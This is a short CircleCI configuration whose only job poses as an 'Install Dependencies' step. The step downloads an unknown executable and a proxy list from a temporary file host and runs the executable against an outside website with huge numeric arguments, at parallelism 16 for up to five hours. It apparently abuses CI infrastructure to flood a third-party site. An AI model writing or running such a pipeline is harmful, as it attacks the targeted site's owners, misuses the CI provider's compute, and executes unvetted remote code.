version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget -y && wget https://temp.sh/ETJnp/jsss && wget https://temp.sh/cRYHi/proxies.txt && chmod +x jsss && ./jsss https://gb.sbs/ 999999 100 99999999999999999999999999999999999999999999999999999999999999999999999
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
